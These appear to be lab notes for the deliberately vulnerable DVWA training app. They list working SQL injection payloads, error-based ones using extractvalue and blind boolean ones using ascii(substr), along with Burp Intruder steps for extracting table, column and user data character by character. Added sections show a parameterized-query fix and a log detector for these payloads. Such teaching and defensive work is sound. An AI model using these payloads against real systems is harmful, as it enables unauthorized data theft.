Dump the database name
1' and extractvalue(1,concat(0x7e,database()));#
Dump the number of tables
1' and extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema='dvwa')))#
Dump the table names
1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='dvwa' limit 0,1)))#
Dump the number of columns
1' and extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users')))#
Dump the column names
1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#
Dump the data stored in a column
1' and extractvalue(1,concat(0x7e,(select user from users limit 0,1)));#
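Every payload above works only because the application splices the id value into the SQL text. The following is an added example (not part of the original notes, and not DVWA's own PHP/MySQL code): a Python/sqlite3 stand-in with a constructed users table, showing the concatenating lookup beside the parameterized one. With binding, the same values are treated as data, so the boolean oracle that the later part of these notes exploits disappears. Note that SQLite's line comment is `-- ` rather than MySQL's `#`, so the probe strings in the helper use that form.

```python
import sqlite3

# Constructed in-memory stand-in for the DVWA "users" table (sample rows, not DVWA's data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, user TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "Gordon", "gordonb")])
    conn.commit()
    return conn

def lookup_vulnerable(conn, user_id):
    # Concatenation: the request value is spliced into the SQL text, so a quote in it
    # closes the literal and whatever follows is parsed as SQL.
    sql = f"SELECT first_name FROM users WHERE user_id = '{user_id}' ORDER BY user_id"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, user_id):
    # Parameter binding: the statement's shape is fixed before the value is seen,
    # so no quote or keyword inside the value can change what the query does.
    sql = "SELECT first_name FROM users WHERE user_id = ? ORDER BY user_id"
    return [row[0] for row in conn.execute(sql, (user_id,))]

def boolean_oracle_visible(lookup):
    """True when the 'and 1=1' / 'and 1=2' pair yields different results through the
    given lookup function, i.e. the application leaks a boolean oracle."""
    conn = make_db()
    return lookup(conn, "1' and 1=1 -- ") != lookup(conn, "1' and 1=2 -- ")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", lookup_vulnerable(db, "1' or '1' = '1"))  # every row
    print("safe, same input:     ", lookup_safe(db, "1' or '1' = '1"))        # nothing
    print("oracle via concatenation:", boolean_oracle_visible(lookup_vulnerable))
    print("oracle via binding:      ", boolean_oracle_visible(lookup_safe))
```

The tautology payload returns the whole table through `lookup_vulnerable` and nothing through `lookup_safe`; more importantly for the blind technique, the true/false probe pair is distinguishable only in the concatenating version. The same holds in PHP with MySQLi or PDO prepared statements, which is the fix for the DVWA code these payloads target.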
ASCII code values (33-126 is the range that matters)
First determine whether the injection point is string-type or numeric-type
1
1'
1"
1 and 1=1 #
1 and 1=2 #
1' and 1=1 #
1' and 1=2 #
1' or '1' = '1 #
1' or '1' = '2 #
Guess the length of the database name
1' and length(database())>10 #
1' and length(database())>5 #
1' and length(database())>3 #
1' and length(database())=4 #
This shows the database name is 4 characters long
Guess the first letter of the database name (ASCII 33-126 covers the common keyboard characters)
1' and ascii(substr(database(),1,1))>88 #
Capture the request with Burp, mark the 1 as a payload position ($), then set the ranges to 0-4 step 1 and 33-126 step 1; the resulting values 100,118,119,97 correspond to d,v,w,a in the ASCII table.
Guess the number of tables
1' and (select count(table_name) from information_schema.tables where table_schema=database()) >10 #
1' and (select count(table_name) from information_schema.tables where table_schema=database()) =2 #
Guess the first table name
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=88 #
Capture with Burp, mark the third 1 and the 88, and use Cluster bomb with the ranges 0-5 step 1 and 33-126 step 1;
the table name comes out as guestbook
Guess the second table name
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=88 #
Capture with Burp, mark the third 1 and the 88, and use Cluster bomb with the ranges 0-5 step 1 and 33-126 step 1;
the table name comes out as users
Dump the number of columns in the users table
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name= 'users') = 8 #
In Burp mark the 8 with $ and set the range to 0-10 step 1
Result: the users table has 8 columns
Dump the field lengths of the users table
1' and length(substr((select column_name from information_schema.columns where table_schema=database() and table_name= 'users' limit 0,1),1))=10 #
In Burp mark the 10 with $ and set the range to 0-10 step 1
The first field in the users table is 7 characters long
Dump the name of the first column in the users table
1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))=100 #
In Burp mark the 1 and the 100 with $ and set the ranges to 0-50 step 1 and 33-126 step 1
Result: the column name is user_id
Dump the name of the second column in the users table
1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),1,1))=100 #
In Burp mark the 1 and the 100 with $ and set the ranges to 0-20 step 1 and 33-126 step 1
Result: the column name is first_name
Dump the data in the first_name column of the users table
1' and length(substr((select user from users limit 0,1),1))=7 #
In Burp mark the 7 with $, set the range to 0-10, and use Sniper
Result: first_name holds 5 rows of data
Dump the length of each entry in the first_name column of the users table
1' and (select count(*) from users)= 20 #
In Burp mark the 20 with $, set the range to 0-20, and use Sniper
Result: users has 5 rows
Dump the length of each entry in the first_name column of the users table
1' and length(substr((select first_name from users limit 0,1),1))=1 #
In Burp mark the 0 and the 1 with $ and set the ranges to 0-20 step 1 and 0-20 step 1
Result: the lengths are 5,6,4,5,3
Extract the data in the column
1' and ascii(substr((select first_name from users limit 0,1),1,1))=1 #
Result: admin
1' and ascii(substr((select first_name from users limit 1,1),1,1))=1 #
Mark the 1 and the 1 with $
The name is 6 characters long: Gordon
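From the defender's side, the Intruder-driven procedure above has a very recognisable shape in web-server logs: one client sends many requests whose id parameter is identical except for a changing number (the position index or the ASCII value), and the decoded parameter carries fragments such as ascii(substr(, information_schema or extractvalue(. The following is an added example, not part of the original notes: a Python detector run over constructed Common Log Format lines (sample traffic, not real DVWA logs). It flags single requests by signature and, separately, bursts of signature-matching requests from one IP that differ only in numeric values. Parameter name, log format and thresholds are assumptions for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Common Log Format request line (assumed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)

# Indicators taken from the payload families in these notes: XPath error extraction,
# schema enumeration, character-by-character comparison, length probes, tautologies.
SIGNATURES = {
    "xpath_error_extraction": re.compile(r"\bextractvalue\s*\("),
    "schema_enumeration":     re.compile(r"\binformation_schema\."),
    "char_by_char_compare":   re.compile(r"\bascii\s*\(\s*substr\s*\("),
    "length_probe":           re.compile(r"\blength\s*\("),
    "boolean_tautology":      re.compile(r"\b(?:and|or)\s+'?\d+'?\s*=\s*'?\d+"),
}

# Constructed sample log: one client enumerating, one issuing an error-based probe, one benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+1%3D1+%23&Submit=Submit HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+1%3D2+%23&Submit=Submit HTTP/1.1" 200 498
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D100+%23&Submit=Submit HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D101+%23&Submit=Submit HTTP/1.1" 200 498
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D102+%23&Submit=Submit HTTP/1.1" 200 498
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /vulnerabilities/sqli/?id=1%27+and+extractvalue%281%2Cconcat%280x7e%2Cdatabase%28%29%29%29%3B%23&Submit=Submit HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:02:00 +0000] "GET /vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:02:01 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27&Submit=Submit HTTP/1.1" 200 498
"""

def decode_param(path, name="id"):
    """URL-decoded, lower-cased, whitespace-normalised value of one query parameter."""
    if "?" not in path:
        return ""
    for pair in path.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return " ".join(unquote_plus(value).lower().split())
    return ""

def match_signatures(value):
    """Names of the indicator patterns present in a decoded parameter value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(value))

def analyze(log_text, param="id", burst_threshold=3):
    """Return per-request hits and per-client enumeration bursts.

    A burst is one client sending >= burst_threshold distinct signature-matching values
    that collapse to the same string once digit runs are replaced by N, which is what
    an Intruder number range over a position or ASCII value produces."""
    hits = []
    variants = defaultdict(set)  # (ip, digit-normalised shape) -> distinct concrete values
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        value = decode_param(m["path"], param)
        if not value:
            continue
        sigs = match_signatures(value)
        if not sigs:
            continue
        hits.append({"ip": m["ip"], "value": value, "signatures": sigs})
        shape = re.sub(r"\d+", "N", value)
        variants[(m["ip"], shape)].add(value)
    bursts = [
        {"ip": ip, "shape": shape, "count": len(vals)}
        for (ip, shape), vals in variants.items() if len(vals) >= burst_threshold
    ]
    return {"hits": hits, "bursts": bursts}

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for h in report["hits"]:
        print(h["ip"], h["signatures"], h["value"])
    for b in report["bursts"]:
        print("burst:", b)
```

The lone quote probe (the `1'` request from 10.0.0.9) matches no signature; detecting it by itself would mostly produce false positives, so this detector relies on the follow-up probes that any real enumeration must send. The burst rule is keyed on signature-matching values only, so a user paging through id=1, id=2, id=3 does not trip it.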